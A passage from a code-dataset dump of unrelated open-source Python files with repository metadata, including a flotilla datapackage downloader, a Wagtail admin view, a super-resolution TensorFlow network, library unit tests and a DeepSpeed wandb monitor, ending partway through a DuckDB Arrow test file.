| 2017-04-19T07:03:03
| 2017-04-19T07:03:03
| 19,319,564
| 104
| 27
|
BSD-3-Clause
| 2023-04-15T19:16:52
| 2014-04-30T16:14:31
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 8,322
|
py
|
datapackage.py
|
"""
Functions to deal with creation and loading of datapackages
"""
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from six import iteritems
# Python 2 and 3 code for urllib module
# http://python-future.org/compatible_idioms.html
try:
from urllib.request import Request, build_opener
except ImportError:
from urllib2 import Request, build_opener
# import gzip # TODO compression
import json
import os
# import string
import sys
import matplotlib as mpl
FLOTILLA_DOWNLOAD_DIR = os.path.expanduser('~/flotilla_projects')
def datapackage_url_to_dict(datapackage_url):
filename = check_if_already_downloaded(datapackage_url)
with open(filename) as f:
datapackage = json.load(f)
return datapackage
def check_if_already_downloaded(url,
datapackage_name=None,
download_dir=FLOTILLA_DOWNLOAD_DIR):
"""Download a url filename, unless it has already been downloaded.
Save into directory named 'datapackage_name' if provided,
otherwise save in directory named after value for key'name' in json file
Parameters
----------
url : str
HTTP url of a file you want to download
Returns
-------
filename : str
Location of the file on your system
"""
try:
os.mkdir(download_dir)
sys.stdout.write('Creating a directory for saving your flotilla '
'projects: {}\n'.format(download_dir))
except OSError:
pass
if datapackage_name is None:
req = Request(url)
opener = build_opener()
opened_url = opener.open(req)
datapackage = json.loads(opened_url.read())
datapackage_name = datapackage['name']
package_dir = '{}/{}'.format(download_dir, datapackage_name)
try:
os.mkdir(package_dir)
sys.stdout.write('Creating a directory for saving the data for this '
'project: {}\n'.format(package_dir))
except OSError:
pass
basename = url.rsplit('/', 1)[-1]
filename = os.path.expanduser(os.path.join(package_dir, basename))
if not os.path.isfile(filename):
sys.stdout.write('{} has not been downloaded before.\n\tDownloading '
'now to {}\n'.format(url, filename))
req = Request(url)
opener = build_opener()
opened_url = opener.open(req)
with open(filename, 'w') as f:
f.write(opened_url.read())
return filename
def write_small_or_big_data(data, resource_name, datapackage_dir,
max_size=1e7):
"""Save dataframe as a gzipped CSV if small, HDF if large
"Large" is determined from the product of the data shape, with a maximum
of `max_size`.
Parameters
----------
data : pandas.DataFrame
The data to save
resource_name : str
Name of the data for saving
datapackage_dir : str
Absolute path, where to save the data to
max_size : int or float
Maximum size of the data to save as a "smaller" CSV format, where
ncol*nrow < max_size
Returns
-------
info : dict
Information about the written file, e.g. path, format, compression to
save with the datapackage
"""
nrow, ncol = data.shape
info = {}
if nrow * ncol < max_size:
# If data is smallish, save as a gzipped csv
# TODO compression
# basename = '{}.csv.gz'.format(resource_name)
basename = '{}.csv'.format(resource_name)
data_filename = '{}/{}'.format(datapackage_dir, basename)
with open(data_filename, 'w') as f:
data.to_csv(f)
# TODO compression
# info['compression'] = 'gzip'
info['format'] = 'csv'
else:
# If data is big, save as an HDF file
basename = '{}.hdf'.format(resource_name)
data_filename = '{}/{}'.format(datapackage_dir, basename)
key = 'data'
info['format'] = 'hdf'
info['key'] = key
data.to_hdf(data_filename, key)
info['path'] = basename
return info
def make_study_datapackage(study_name, metadata,
expression_data=None,
splicing_data=None,
mapping_stats_data=None,
title='',
sources='', license=None, species=None,
flotilla_dir=FLOTILLA_DOWNLOAD_DIR,
metadata_kws=None,
expression_kws=None,
splicing_kws=None,
mapping_stats_kws=None,
version=None,
expression_feature_kws=None,
expression_feature_data=None,
splicing_feature_data=None,
splicing_feature_kws=None,
gene_ontology=None,
supplemental_kws=None,
host="https://s3-us-west-2.amazonaws.com/",
host_destination='flotilla-projects/'):
"""Example code for making a datapackage for a Study"""
if len(study_name.split()) > 1:
raise ValueError("Datapackage name cannot have any whitespace")
# if set(string.uppercase) & set(study_name):
if not study_name.lower() == study_name:
raise ValueError("Datapackage can only contain lowercase letters")
datapackage_dir = '{}/{}'.format(flotilla_dir, study_name)
try:
os.makedirs(datapackage_dir)
except OSError:
pass
supplemental_kws = {} if supplemental_kws is None else supplemental_kws
datapackage = {'name': study_name, 'title': title, 'sources': sources,
'licenses': license, 'datapackage_version': version}
if species is not None:
datapackage['species'] = species
resources = {'metadata': (metadata, metadata_kws),
'expression': (expression_data, expression_kws),
'splicing': (splicing_data, splicing_kws),
'mapping_stats': (mapping_stats_data, mapping_stats_kws),
'expression_feature': (expression_feature_data,
expression_feature_kws),
'splicing_feature': (splicing_feature_data,
splicing_feature_kws),
'gene_ontology': (gene_ontology, {})}
datapackage['resources'] = []
for resource_name, (data, kws) in resources.items():
if data is None:
continue
datapackage['resources'].append({'name': resource_name})
resource = datapackage['resources'][-1]
info = write_small_or_big_data(data, resource_name, datapackage_dir)
resource.update(info)
if kws is not None:
for key, value in iteritems(kws):
if key == 'phenotype_to_color':
value = dict((k, mpl.colors.rgb2hex(v))
if isinstance(v, tuple) else
(k, v)
for k, v in iteritems(value)
)
resource[key] = value
datapackage['resources'].append({'name': 'supplemental'})
supplemental = datapackage['resources'][-1]
supplemental['resources'] = []
for supplemental_name, data in supplemental_kws.items():
resource = {}
resource['name'] = supplemental_name
info = write_small_or_big_data(data, supplemental_name,
datapackage_dir)
resource.update(info)
supplemental['resources'].append(resource)
filename = '{}/datapackage.json'.format(datapackage_dir)
with open(filename, 'w') as f:
json.dump(datapackage, f, indent=2)
sys.stdout.write('Wrote datapackage to {}\n'.format(filename))
def name_to_resource(datapackage, name):
"""Get resource with specified name in the datapackage"""
for resource in datapackage['resources']:
if resource['name'] == name:
return resource
raise ValueError('No resource named {} in this datapackage'.format(name))
|
b5dc868863f35b82be780114672828b24b1d6c19
|
70fec09ceb625608d561937955c285c0c39f6d95
|
/tomodachi/invoker/__init__.py
|
da4dea0c2ac0c99114178f57ba099536c261e26a
|
[
"MIT"
] |
permissive
|
kalaspuff/tomodachi
|
b285e2c73696d14e3c84a479745e00824fba7190
|
deca849ec2b4cdc3d27f06e9ce0056fac0146a1a
|
refs/heads/master
| 2023-08-31T00:32:12.042486
| 2023-08-21T13:02:24
| 2023-08-21T13:02:24
| 62,165,703
| 191
| 28
|
MIT
| 2023-09-11T23:32:51
| 2016-06-28T18:43:51
|
Python
|
UTF-8
|
Python
| false
| false
| 270
|
py
|
__init__.py
|
from .base import FUNCTION_ATTRIBUTE, INVOKER_TASK_START_KEYWORD, START_ATTRIBUTE, Invoker # noqa
from .decorator import decorator # noqa
__all__ = [
"FUNCTION_ATTRIBUTE",
"INVOKER_TASK_START_KEYWORD",
"START_ATTRIBUTE",
"Invoker",
"decorator",
]
|
1dbe4817643e74deeef7adb41c3f09f9ff870d46
|
529e713a78e82de2ae5d44cfb8ef209e0894d72a
|
/subprocess/basics_win.py
|
e7a2f9939d0e360b6fe518853ca08bb330f7621f
|
[
"MIT"
] |
permissive
|
realpython/materials
|
cd2f548276be2c82f134ca03eadb1cd279e0f26e
|
d2d62756d3854f54a12a767f2bf9470486c0ceef
|
refs/heads/master
| 2023-09-05T22:12:29.806738
| 2023-08-31T20:56:28
| 2023-08-31T20:56:28
| 132,374,697
| 4,678
| 6,482
|
MIT
| 2023-09-12T22:22:06
| 2018-05-06T20:46:18
|
HTML
|
UTF-8
|
Python
| false
| false
| 498
|
py
|
basics_win.py
|
"""
**Only works on Windows**
Demonstrates basic usage of `subprocess.run()`.
"""
import subprocess
# https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmd
subprocess.run("dir", shell=True) # COMSPEC env variable
subprocess.run(["cmd.exe", "/c", "dir"])
# https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_pwsh?view=powershell-7.2
subprocess.run(["powershell", "-Command", "ls"])
subprocess.run(["python", "helloworld.py"])
|
7136158ed013de9464ca51f7d2d06dbbc17a3fbb
|
d1f15554df2d5c0f74ddbcba6e870359841f682b
|
/wagtail/admin/views/pages/usage.py
|
d42a594e6f9a8f383134b79d2ac08647acd63cc1
|
[
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
wagtail/wagtail
|
bd405f89b86e0c625fef0685fd6bfba41cf5cbfc
|
06a7bc6124bf62675c09fbe0a4ed9bbac183e025
|
refs/heads/main
| 2023-09-04T06:22:51.601208
| 2023-09-01T15:22:00
| 2023-09-01T15:22:00
| 16,479,108
| 12,974
| 3,580
|
BSD-3-Clause
| 2023-09-14T10:45:04
| 2014-02-03T12:41:59
|
Python
|
UTF-8
|
Python
| false
| false
| 2,858
|
py
|
usage.py
|
from typing import Any, Dict
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import PermissionDenied
from django.http import Http404
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from wagtail.admin.ui.tables import Column, DateColumn
from wagtail.admin.ui.tables.pages import (
PageStatusColumn,
PageTable,
PageTitleColumn,
ParentPageColumn,
)
from wagtail.admin.views import generic
from wagtail.admin.views.generic.base import BaseListingView
from wagtail.models import Page
class ContentTypeUseView(BaseListingView):
results_template_name = "wagtailadmin/pages/usage_results.html"
page_title = _("Pages using")
header_icon = "doc-empty-inverse"
page_kwarg = "p"
paginate_by = 50
columns = [
PageTitleColumn("title", label=_("Title")),
ParentPageColumn("parent", label=_("Parent")),
DateColumn("latest_revision_created_at", label=_("Updated"), width="12%"),
Column("type", label=_("Type"), accessor="page_type_display_name", width="12%"),
PageStatusColumn("status", label=_("Status"), width="12%"),
]
table_class = PageTable
table_classname = "listing align-top"
def get(self, request, *, content_type_app_name, content_type_model_name):
try:
content_type = ContentType.objects.get_by_natural_key(
content_type_app_name, content_type_model_name
)
except ContentType.DoesNotExist:
raise Http404
self.page_class = content_type.model_class()
# page_class must be a Page type and not some other random model
if not issubclass(self.page_class, Page):
raise Http404
return super().get(request)
def get_page_subtitle(self):
return self.page_class.get_verbose_name()
def get_queryset(self):
return self.page_class.objects.all().specific(defer=True)
def get_index_url(self):
return reverse(
"wagtailadmin_pages:type_use",
args=[
self.kwargs["content_type_app_name"],
self.kwargs["content_type_model_name"],
],
)
def get_context_data(self, **kwargs: Any) -> Dict[str, Any]:
context = super().get_context_data(**kwargs)
context.update(
{
"index_url": self.get_index_url(),
"page_class": self.page_class,
}
)
return context
class UsageView(generic.UsageView):
model = Page
pk_url_kwarg = "page_id"
header_icon = "doc-empty-inverse"
def dispatch(self, request, *args, **kwargs):
if not self.object.permissions_for_user(request.user).can_edit():
raise PermissionDenied
return super().dispatch(request, *args, **kwargs)
|
e4b0e2c36984dc8a4679add110cbbc68afdf8b2b
|
4ad53199feb82d911bd2edbe0b5713da8c1909c1
|
/test/writer/test_null_writer.py
|
5dcee68fff85e0f5a2a2e601676be069189cfed4
|
[
"MIT"
] |
permissive
|
thombashi/pytablewriter
|
9bf8b73da0eb18dba835e951021fd581958a4d12
|
49f9da777625a5b920c2c87c5e086d33d19a80d4
|
refs/heads/master
| 2023-08-19T05:13:15.333317
| 2023-07-01T08:03:47
| 2023-07-01T08:03:47
| 59,484,958
| 609
| 43
|
MIT
| 2021-09-20T15:26:45
| 2016-05-23T13:25:53
|
Python
|
UTF-8
|
Python
| false
| false
| 1,397
|
py
|
test_null_writer.py
|
"""
.. codeauthor:: Tsuyoshi Hombashi <tsuyoshi.hombashi@gmail.com>
"""
import pytablewriter
table_writer_class = pytablewriter.NullTableWriter
class Test_NullTableWriter_set_indent_level:
def test_smoke(self):
writer = table_writer_class()
writer.set_indent_level(0)
class Test_NullTableWriter_inc_indent_level:
def test_smoke(self):
writer = table_writer_class()
writer.inc_indent_level()
class Test_NullTableWriter_dec_indent_level:
def test_smoke(self):
writer = table_writer_class()
writer.dec_indent_level()
class Test_NullTableWriter_write_new_line:
def test_smoke(self, capsys):
writer = table_writer_class()
writer.write_null_line()
out, _err = capsys.readouterr()
assert out == ""
class Test_NullTableWriter_write_table:
def test_smoke(self, capsys):
writer = table_writer_class()
writer.write_table()
out, _err = capsys.readouterr()
assert out == ""
class Test_NullTableWriter_dumps:
def test_smoke(self):
writer = table_writer_class()
assert writer.dumps() == ""
assert str(writer) == ""
class Test_NullTableWriter_write_table_iter:
def test_smoke(self, capsys):
writer = table_writer_class()
writer.write_table_iter()
out, _err = capsys.readouterr()
assert out == ""
|
09d79324594e64cac05714709dc10d81ef3c233e
|
94724578994ab1438dcefb51b7ef4d8570da5d4c
|
/z42/zapp/_WEB/model/ob.py
|
ce124b570396cf5c96b989ddc7b8b8b905fc33bb
|
[] |
no_license
|
PegasusWang/collection_python
|
6648d83203634abf44fd42c0b37b0bf7cc406d8f
|
9ef019a737a0817860d3184924c67a0833bd1252
|
refs/heads/master
| 2023-09-01T23:15:39.813635
| 2023-08-24T06:46:12
| 2023-08-24T06:46:12
| 43,693,872
| 130
| 90
| null | 2021-04-26T15:12:55
| 2015-10-05T15:28:15
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,347
|
py
|
ob.py
|
#!/usr/bin/env python
#coding:utf-8
import _env
from zapp._WEB.model._db import redis, Doc
from gid import gid
from z42.config import HOST, QINIU
from attrcache import attrcache
class Ob(Doc):
structure = dict(
id=int,
name=str,
ico=str,
)
indexes = [
{'fields':['id']}
]
@staticmethod
def new(name):
id = gid()
o = Ob(dict(id=id, name=str(name), ico=''))
o.save()
return id
def ico_new(self, ico, crop=None):
self.ico = ico
self.save()
@property
def ico_url(self):
#TODO
return ''
@property
def url(self):
#TODO
return "//%s.%s"%(self.id, HOST)
@staticmethod
def by_id_list(li):
if li:
return Ob.find({"id":{"$in":map(int,li)}})
return []
def ob_name_ico_by_id(id):
ob = Ob.find_one({'id':id})
return ob.name, ob.ico or 0
def ob_name_by_id(id):
return Ob.find_one({'id':id}).name
def name_ico_dict_by_id_list(li):
result = {}
for i in Ob.by_id_list(li):
result[i.id] = (str(i.name), i.ico or 0)
return result
def name_dict_by_id_list(li):
result = {}
for i in Ob.by_id_list(li):
result[i.id] = str(i.name)
return result
if __name__ == '__main__':
for i in Ob.find():
print i
|
6917949523231067594d25eaa925c6c9ac4aba49
|
52a677b94056d3397b4a499bc9185adb68a63f05
|
/util/test/test_dockerfileparse.py
|
199162a0ffd1642dac33e08fcf43eabdcf925230
|
[
"Apache-2.0"
] |
permissive
|
quay/quay
|
9b6fcff54efc0dbf7c6d91fa80676950555b6f1a
|
e400a0c22c5f89dd35d571654b13d262b1f6e3b3
|
refs/heads/master
| 2023-08-28T15:08:38.001842
| 2023-08-28T13:52:31
| 2023-08-28T13:52:31
| 220,517,730
| 2,363
| 322
|
Apache-2.0
| 2023-09-14T17:43:48
| 2019-11-08T17:37:05
|
Python
|
UTF-8
|
Python
| false
| false
| 1,693
|
py
|
test_dockerfileparse.py
|
# -*- coding: utf-8 -*-
from util.dockerfileparse import parse_dockerfile
def test_basic_parse():
parsed = parse_dockerfile(
"""
FROM someimage:latest
RUN dosomething
"""
)
assert parsed.get_image_and_tag() == ("someimage", "latest")
assert parsed.get_base_image() == "someimage"
def test_basic_parse_notag():
parsed = parse_dockerfile(
"""
FROM someimage
RUN dosomething
"""
)
assert parsed.get_image_and_tag() == ("someimage", "latest")
assert parsed.get_base_image() == "someimage"
def test_two_from_lines():
parsed = parse_dockerfile(
"""
FROM someimage:latest
FROM secondimage:second
"""
)
assert parsed.get_image_and_tag() == ("secondimage", "second")
assert parsed.get_base_image() == "secondimage"
def test_parse_comments():
parsed = parse_dockerfile(
"""
# FROM someimage:latest
FROM anotherimage:foobar # This is a comment
RUN dosomething
"""
)
assert parsed.get_image_and_tag() == ("anotherimage", "foobar")
assert parsed.get_base_image() == "anotherimage"
def test_unicode_parse_as_ascii():
parsed = parse_dockerfile(
"""
FROM someimage:latest
MAINTAINER José Schorr <jschorr@whatever.com>
"""
)
assert parsed.get_image_and_tag() == ("someimage", "latest")
assert parsed.get_base_image() == "someimage"
def test_unicode_parse_as_unicode():
parsed = parse_dockerfile(
"""
FROM someimage:latest
MAINTAINER José Schorr <jschorr@whatever.com>
"""
)
assert parsed.get_image_and_tag() == ("someimage", "latest")
assert parsed.get_base_image() == "someimage"
|
2fb5d34c1a28ed7dd8048090b94ff1d9d3a8dd63
|
bb33e6be8316f35decbb2b81badf2b6dcf7df515
|
/source/res/scripts/client/gui/impl/lobby/tooltips/tankman_tooltip_view.py
|
19437c1a730df0ebc2507ee4db742ffb37ad58f7
|
[] |
no_license
|
StranikS-Scan/WorldOfTanks-Decompiled
|
999c9567de38c32c760ab72c21c00ea7bc20990c
|
d2fe9c195825ececc728e87a02983908b7ea9199
|
refs/heads/1.18
| 2023-08-25T17:39:27.718097
| 2022-09-22T06:49:44
| 2022-09-22T06:49:44
| 148,696,315
| 103
| 39
| null | 2022-09-14T17:50:03
| 2018-09-13T20:49:11
|
Python
|
UTF-8
|
Python
| false
| false
| 1,710
|
py
|
tankman_tooltip_view.py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/impl/lobby/tooltips/tankman_tooltip_view.py
from frameworks.wulf import ViewSettings
from gui.impl.gen import R
from gui.impl.gen.view_models.views.lobby.tooltips.tankman_tooltip_view_model import TankmanTooltipViewModel
from gui.impl.gen.view_models.views.lobby.tooltips.tankman_tooltip_view_icon_model import TankmanTooltipViewIconModel
from gui.impl.pub import ViewImpl
class TankmanTooltipView(ViewImpl):
__slots__ = ('__tankmanInfo',)
def __init__(self, tankmanInfo):
settings = ViewSettings(R.views.lobby.tooltips.TankmanTooltipView())
settings.model = TankmanTooltipViewModel()
self.__tankmanInfo = tankmanInfo
super(TankmanTooltipView, self).__init__(settings)
@property
def viewModel(self):
return super(TankmanTooltipView, self).getViewModel()
def _onLoading(self, *args, **kwargs):
super(TankmanTooltipView, self)._onLoading()
with self.viewModel.transaction() as model:
model.setTitle(self.__tankmanInfo.getFullUserName())
model.setSubtitle(self.__tankmanInfo.getLabel())
model.setMainIcon(self.__tankmanInfo.getTankmanIcon())
model.setDescription(self.__tankmanInfo.getDescription())
model.setIconsTitle(self.__tankmanInfo.getSkillsLabel())
skillsModel = model.icons
skillsModel.clearItems()
for skill in self.__tankmanInfo.getSkills():
skillModel = TankmanTooltipViewIconModel()
skillModel.setIcon(skill)
skillsModel.addViewModel(skillModel)
skillsModel.invalidate()
|
1388116c542a032d22110fa0d548845e12066270
|
483424524c70852cc043e0d77bf1b757a61d797a
|
/deepspeed/monitor/wandb.py
|
30209191171afc4c0ad3ff7088639f7d678cd505
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
microsoft/DeepSpeed
|
810f1af320020718d0794f5a97cde6f1d17af122
|
55d9964c59c0c6e23158b5789a5c36c28939a7b0
|
refs/heads/master
| 2023-09-06T07:40:52.145692
| 2023-09-05T23:51:23
| 2023-09-05T23:51:23
| 235,860,204
| 27,557
| 3,347
|
Apache-2.0
| 2023-09-14T21:38:46
| 2020-01-23T18:35:18
|
Python
|
UTF-8
|
Python
| false
| false
| 1,150
|
py
|
wandb.py
|
# Copyright (c) Microsoft Corporation.
# SPDX-License-Identifier: Apache-2.0
# DeepSpeed Team
from .utils import check_wandb_availability
from .monitor import Monitor
import deepspeed.comm as dist
class WandbMonitor(Monitor):
def __init__(self, wandb_config):
super().__init__(wandb_config)
check_wandb_availability()
import wandb
self.enabled = wandb_config.enabled
self.group = wandb_config.group
self.team = wandb_config.team
self.project = wandb_config.project
if self.enabled and dist.get_rank() == 0:
wandb.init(project=self.project, group=self.group, entity=self.team)
def log(self, data, step=None, commit=None, sync=None):
if self.enabled and dist.get_rank() == 0:
import wandb
return wandb.log(data, step=step, commit=commit, sync=sync)
def write_events(self, event_list):
if self.enabled and dist.get_rank() == 0:
for event in event_list:
label = event[0]
value = event[1]
step = event[2]
self.log({label: value}, step=step)
|
5976dc24e3ff6475b744d25a64bf2501f87a9898
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/testData/completion/superMethodAnnotationsCopiedFromThirdPartyLibrary/src/a.after.py
|
50c2283b5c5c2f37b366425e8e1edece1d2623bd
|
[
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 85
|
py
|
a.after.py
|
from mod import Super
class Sub(Super):
def method(self, x: int) -> str:<caret>
|
89bd0cfef5c06dcfad81154d9bdc3cb86ef16c25
|
1abd8852158451ffe4dbe0d885e2be0ed1dd50d8
|
/drafts/distance_to_line.py
|
93512845d979a33c19336094f08c15b69c78d556
|
[
"Unlicense"
] |
permissive
|
akalenuk/wordsandbuttons
|
f7c1479ce08fc9f01d1043ed54b2dbd330003e79
|
ef0c89ec06452a0b1913d849039b399708eae957
|
refs/heads/master
| 2023-08-30T04:07:14.672481
| 2023-08-24T07:18:04
| 2023-08-24T07:18:04
| 110,279,805
| 440
| 25
|
Unlicense
| 2020-05-22T15:58:51
| 2017-11-10T18:30:49
|
HTML
|
UTF-8
|
Python
| false
| false
| 270
|
py
|
distance_to_line.py
|
from sympy import *
from sympy.vector import *
x, y, x1, y1, x2, y2, a = symbols('x y x1 y1 x2 y2 a')
N = CoordSys3D('N')
p = x*N.i + y*N.j
l1 = x1*N.i + y1*N.j
l2 = x2*N.i + y2*N.j
the_a = solve([
dot(l1 + (l2 - l1) * a - p, l2 - l1)
], (a))
print (jscode(the_a))
|
09ada2d9b43799d1b172358d3ca4a73f03b831af
|
05599a7cebc38c40baa4ec0e48308a83f0bacd3b
|
/tests/test_tda.py
|
e3578999547fbfd12487903fe06cc58561793957
|
[
"MIT"
] |
permissive
|
jmfernandes/robin_stocks
|
4c0fc06fe1ee7c333b9768b9619729807826a5e2
|
6dc9dacae3e8882ffed3e3cf0eced02b147ef575
|
refs/heads/master
| 2023-08-26T05:22:55.301054
| 2023-08-07T02:52:43
| 2023-08-07T02:52:43
| 122,554,275
| 1,618
| 510
|
MIT
| 2023-08-25T17:22:23
| 2018-02-23T00:49:37
|
Python
|
UTF-8
|
Python
| false
| false
| 571
|
py
|
test_tda.py
|
import os
import robin_stocks.tda as t
from dotenv import load_dotenv
load_dotenv()
class TestAuthentication:
def test_login(self):
t.login(os.environ['tda_encryption_passcode'])
assert t.get_login_state()
class TestStocks:
ticker = "TSLA"
@classmethod
def setup_class(cls):
t.login(os.environ['tda_encryption_passcode'])
def test_quote(self):
resp, err = t.get_quote(self.ticker)
data = resp.json()
assert resp.status_code == 200
assert err is None
assert self.ticker in data
|
443bc527d7aea038a9d39854311732b622af639c
|
3a05bb0d4a598d18e9c90c0a35bd44556fcd94d3
|
/ask-sdk-model/ask_sdk_model/services/api_client.py
|
20507f064b0755d35d56d14a1aa0b3ca750358e5
|
[
"Apache-2.0"
] |
permissive
|
alexa/alexa-apis-for-python
|
2e21330c7e35b76e4f360aa72a9e789906f3bca1
|
751e6dbbb829ceb34dd7405eb77235c06b19c612
|
refs/heads/master
| 2023-08-28T12:50:05.522913
| 2023-08-21T16:04:58
| 2023-08-21T16:04:58
| 145,045,841
| 119
| 34
|
Apache-2.0
| 2022-07-19T16:40:29
| 2018-08-16T22:40:28
|
Python
|
UTF-8
|
Python
| false
| false
| 1,499
|
py
|
api_client.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import typing
from abc import ABCMeta, abstractmethod
if typing.TYPE_CHECKING:
from .api_client_request import ApiClientRequest
from .api_client_response import ApiClientResponse
class ApiClient(object):
"""Represents a basic contract for API request invocation."""
__metaclass__ = ABCMeta
@abstractmethod
def invoke(self, request):
# type: (ApiClientRequest) -> ApiClientResponse
"""Dispatches a request to an API endpoint described in the request.
The ApiClient is expected to resolve in the case an API returns
a non-200 HTTP status code. The responsibility of translating a
particular response code to an error lies with the caller.
:param request: Request to dispatch to the ApiClient
:type request: ApiClientRequest
:return: Response from the client call
:rtype: ApiClientResponse
"""
pass
|
d58fefeb1eb72821a10ab74108358e7b119890ea
|
f1067387acc6e436fe356e5d387cc806dfa20e41
|
/net.py
|
b687d505b2e076f68c3f831a8bc6db0e0a500d06
|
[
"MIT"
] |
permissive
|
nilboy/pixel-recursive-super-resolution
|
e9dcd636307ee62d53188973fa9d8e76c26e0e24
|
925d04afb44c035c10f604a7eca02e8f3bc5eb96
|
refs/heads/master
| 2021-01-20T13:23:35.222047
| 2017-07-02T12:18:03
| 2017-07-02T12:18:03
| 82,688,011
| 457
| 168
|
MIT
| 2019-05-07T14:28:16
| 2017-02-21T14:18:31
|
Python
|
UTF-8
|
Python
| false
| false
| 3,420
|
py
|
net.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
from ops import *
class Net(object):
def __init__(self, hr_images, lr_images, scope):
"""
Args:[0, 255]
hr_images: [batch_size, hr_height, hr_width, in_channels] float32
lr_images: [batch_size, lr_height, lr_width, in_channels] float32
"""
with tf.variable_scope(scope) as scope:
self.train = tf.placeholder(tf.bool)
self.construct_net(hr_images, lr_images)
def prior_network(self, hr_images):
"""
Args:[-0.5, 0.5]
hr_images: [batch_size, hr_height, hr_width, in_channels]
Returns:
prior_logits: [batch_size, hr_height, hr_width, 3*256]
"""
with tf.variable_scope('prior') as scope:
conv1 = conv2d(hr_images, 64, [7, 7], strides=[1, 1], mask_type='A', scope="conv1")
inputs = conv1
state = conv1
for i in range(20):
inputs, state = gated_conv2d(inputs, state, [5, 5], scope='gated' + str(i))
conv2 = conv2d(inputs, 1024, [1, 1], strides=[1, 1], mask_type='B', scope="conv2")
conv2 = tf.nn.relu(conv2)
prior_logits = conv2d(conv2, 3 * 256, [1, 1], strides=[1, 1], mask_type='B', scope="conv3")
prior_logits = tf.concat([prior_logits[:, :, :, 0::3], prior_logits[:, :, :, 1::3], prior_logits[:, :, :, 2::3]], 3)
return prior_logits
def conditioning_network(self, lr_images):
"""
Args:[-0.5, 0.5]
lr_images: [batch_size, lr_height, lr_width, in_channels]
Returns:
conditioning_logits: [batch_size, hr_height, hr_width, 3*256]
"""
res_num = 6
with tf.variable_scope('conditioning') as scope:
inputs = lr_images
inputs = conv2d(inputs, 32, [1, 1], strides=[1, 1], mask_type=None, scope="conv_init")
for i in range(2):
for j in range(res_num):
inputs = resnet_block(inputs, 32, [3, 3], strides=[1, 1], scope='res' + str(i) + str(j), train=self.train)
inputs = deconv2d(inputs, 32, [3, 3], strides=[2, 2], scope="deconv" + str(i))
inputs = tf.nn.relu(inputs)
for i in range(res_num):
inputs = resnet_block(inputs, 32, [3, 3], strides=[1, 1], scope='res3' + str(i), train=self.train)
conditioning_logits = conv2d(inputs, 3*256, [1, 1], strides=[1, 1], mask_type=None, scope="conv")
return conditioning_logits
def softmax_loss(self, logits, labels):
logits = tf.reshape(logits, [-1, 256])
labels = tf.cast(labels, tf.int32)
labels = tf.reshape(labels, [-1])
return tf.losses.sparse_softmax_cross_entropy(
labels, logits)
def construct_net(self, hr_images, lr_images):
"""
Args: [0, 255]
"""
#labels
labels = hr_images
#normalization images [-0.5, 0.5]
hr_images = hr_images / 255.0 - 0.5
lr_images = lr_images / 255.0 - 0.5
self.prior_logits = self.prior_network(hr_images)
self.conditioning_logits = self.conditioning_network(lr_images)
loss1 = self.softmax_loss(self.prior_logits + self.conditioning_logits, labels)
loss2 = self.softmax_loss(self.conditioning_logits, labels)
loss3 = self.softmax_loss(self.prior_logits, labels)
self.loss = loss1 + loss2
tf.summary.scalar('loss', self.loss)
tf.summary.scalar('loss_prior', loss3)
|
80ab3fdab83116fc35389c8f8c9672df599a5ed9
|
39bcafc5f6b1672f31f0f6ea9c8d6047ee432950
|
/tools/pythonpkg/tests/fast/arrow/test_arrow_fetch.py
|
093989f1e06d93814d967817cbe6a5ca4c2fd0af
|
[
"MIT"
] |
permissive
|
duckdb/duckdb
|
315270af6b198d26eb41a20fc7a0eda04aeef294
|
f89ccfe0ec01eb613af9c8ac7c264a5ef86d7c3a
|
refs/heads/main
| 2023-09-05T08:14:21.278345
| 2023-09-05T07:28:59
| 2023-09-05T07:28:59
| 138,754,790
| 8,964
| 986
|
MIT
| 2023-09-14T18:42:49
| 2018-06-26T15:04:45
|
C++
|
UTF-8
|
Python
| false
| false
| 3,036
|
py
|
test_arrow_fetch.py
|
import duckdb
import pytest
try:
import pyarrow as pa
can_run = True
except:
can_run = False
def check_equal(duckdb_conn):
true_result = duckdb_conn.execute("SELECT * from test").fetchall()
duck_tbl = duckdb_conn.table("test")
duck_from_arrow = duckdb_conn.from_arrow(duck_tbl.arrow())
duck_from_arrow.create("testarrow")
arrow_result = duckdb_conn.execute("SELECT * from testarrow").fetchall()
assert arrow_result == true_result
class TestArrowFetch(object):
def test_over_vector_size(self, duckdb_cursor):
if not can_run:
return
duckdb_conn = duckdb.connect()
duckdb_conn.execute("CREATE TABLE test (a INTEGER)")
for value in range(10000):
duckdb_conn.execute("INSERT INTO test VALUES (" + str(value) + ");")
duckdb_conn.execute("INSERT INTO test VALUES(NULL);")
check_equal(duckdb_conn)
def test_empty_table(self, duckdb_cursor):
if not can_run:
return
duckdb_conn = duckdb.connect()
duckdb_conn.execute("CREATE TABLE test (a INTEGER)")
check_equal(duckdb_conn)
def test_over_vector_size(self, duckdb_cursor):
if not can_run:
return
duckdb_conn = duckdb.connect()
duckdb_conn.execute("CREATE TABLE test (a INTEGER)")
for value in range(10000):
